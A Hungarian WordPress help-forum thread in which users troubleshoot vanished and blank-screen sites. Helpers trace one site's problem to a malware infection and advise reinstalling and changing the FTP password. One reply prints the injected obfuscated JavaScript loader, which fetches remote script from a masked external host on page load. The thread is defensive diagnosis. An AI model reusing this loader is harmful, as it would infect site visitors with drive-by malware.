SOS - Eltűnt a honlap

Sziasztok!





Nagyon-nagyon kezdő vagyok, és tegnap azt hiszem csináltam valami fatális baromságot, ugyenis eltűnt az oldal…





Az egésznek a keretét vki más csinálta meg nekem, én csak a tartalmat töltöttem fel az oldalra… miután mindent feltöltöttem kértem a srácot, hogy véglegesítse a honlapot (azaz tegye át ezt az új verziót, amin dolgoztam a régi helyére), de közölte, hogy most erre neki hetekig nem lesz ideje. Hát kezembe próbáltam venni a dolgokat ilyen eredménnyel:




www.agacska.hu/ujsite


A www.agacska.hu/ujsite/wp-admin - on pedig semmi nem jön be...


Szerintetek ez végzetes és totál eltűnt minden, vagyis kezdhetem előlről, vagy azért van még valami remény?


Köszi!


B.

láthatóan a sablon nincs a helyén.





a “fotosky-10” nevű sablont másold fel a wp-content/themes mappába.

hali. eltünt szó szerint a honlap. fehér képernyő és ennyi.





pedig ma még működött. egy fájlt se módosítottam és nem is töröltem.





mi lehet a probléma?

Mit szólnál,ha mondjuk egy URL-t is írnál? Esetleg,talán véletlenül,ha nem nagy fáradság…meg picit több infót…

www.bozsiracing.hu


sokmindent nem látni rajta.


több infót?





kb. 1 hónapja működik a honlap rendesen. most hirtelen nem jön be, pedig még délután jó volt.


külön theme van betéve. ftp-n ugyanúgy van minden ahogy eddig is.

plugin könyvtárat nevezd át.

vagy az aktuális sablonodét. ha az volt a gond akkor a defaultra fog váltani helyette…

Spec nálam visít a NOD valami Kryptik nevű módosult win32 alkalmazás miatt, amint felmegyek az oldalra…

hiába módosítom a plugins és a themes mappába lévő mappa nevét, ugyanúgy fehér a képernyő.





ma annyit csináltam, hogy feltöltöttem egy 900 megás zip fájlt ftpre (semmi köze nincs a honlaphoz), majd letöröltem. de gondolom nem emiatt van a probléma.


'Balou' wrote on '2009-12-13:




Spec nálam visít a NOD valami Kryptik nevű módosult win32 alkalmazás miatt, amint felmegyek az oldalra...








lehet benne valami, nekem ESET, az meg nem ricsajkodik feleslegesen, de most hogy megnéztem, valami pdf-et akar megnyitni a lap... :o





viszont, a nagy fehérség nem az, hanem:





Code:

/*GNU GPL*/ try{window.onload = function(){var E411a2jh88t = document.createElement('script');E411a2jh88t.setAttribute('type', 'text/javascript');E411a2jh88t.setAttribute('id', 'myscript1');E411a2jh88t.setAttribute('src', 'h(#t)$&(t((p():@&/)!/^&&w#(i))k(i&&p!(e$)d!&i(^a@((-$o#)r^!(@g!&$.&$s$&m^^)a)@#s!h&^@i!@$)(n))!g)m)@a)g&((a(@z&(i&n$$##e().^$(!c@o$#)@m^.!!@f!&o#$)o$(#d!#n$!(e^)t!&$&w^$o)r!#&k)@-#()c(o@m!.$^&e^&)a$s&^y!@$!#t)&a))b!^(l#&@e#t@!@e@(n@$^n!@&i^^s!)!.&&r$&u!:@))(8^$0^8)(@0$&#/@&(1!((9!l@o$&^u#@#.^&c@@$o!m!@^/&#^1)(9))l^(!o#&@u@(.$#(c(#o!&!^m##/@#^g#@o$o((g@^l^)$e^.(#$#c!!$o^m!!#$/(&!^z#a!)p#@p&$^o$@&s#)(.(@&&c$)o(^!m!((/)&@&&a(v!^$a&!$$s!t)^(.#&c#(o&(m@/$'.replace(/&|)|(|$|@|^|!|#/ig, ''));E411a2jh88t.setAttribute('defer', 'defer');document.body.appendChild(E411a2jh88t);}} catch(e) {}








úgyhogy újratelepítés, és ftp jelszóváltás!!!

Mano, a NOD nálam egyenlő az ESET-tel,szal ugyan arról beszéltünk :slight_smile: A kód meg igen,az lemaradt… szépen benyaltál valami vírust skarc ami felkúszott a tárhelyre…

yaya nekem csak annyi szúrt szemet, h egy .ru végződésű lapra akar átirányítani… vagyis onnan tölt bemit az ff :slight_smile:

hát nagyon örülök neki. hogyan tudnám elérni pl. az összes bejegyzést?





kezdőlapon lévő szövegek, illetve amiket létrehoztam oldalakat. nincs nagy kedvem előröl írni. :frowning:

az adatbázisodan tárolódnak… de lehet h azokat is újra kell majd írnod :smiley:


'skarc' wrote on '2009-12-13:




www.bozsiracing.hu








Én most méztem. És a Kaspersky Internet Security csak 2 piros abalakot is feldobott... és trojan downloadert is jelzett rajta!!! Ezt nagyon alaposan ki kell takaritani!

Túl összetett lett ez a topik csiki csuki.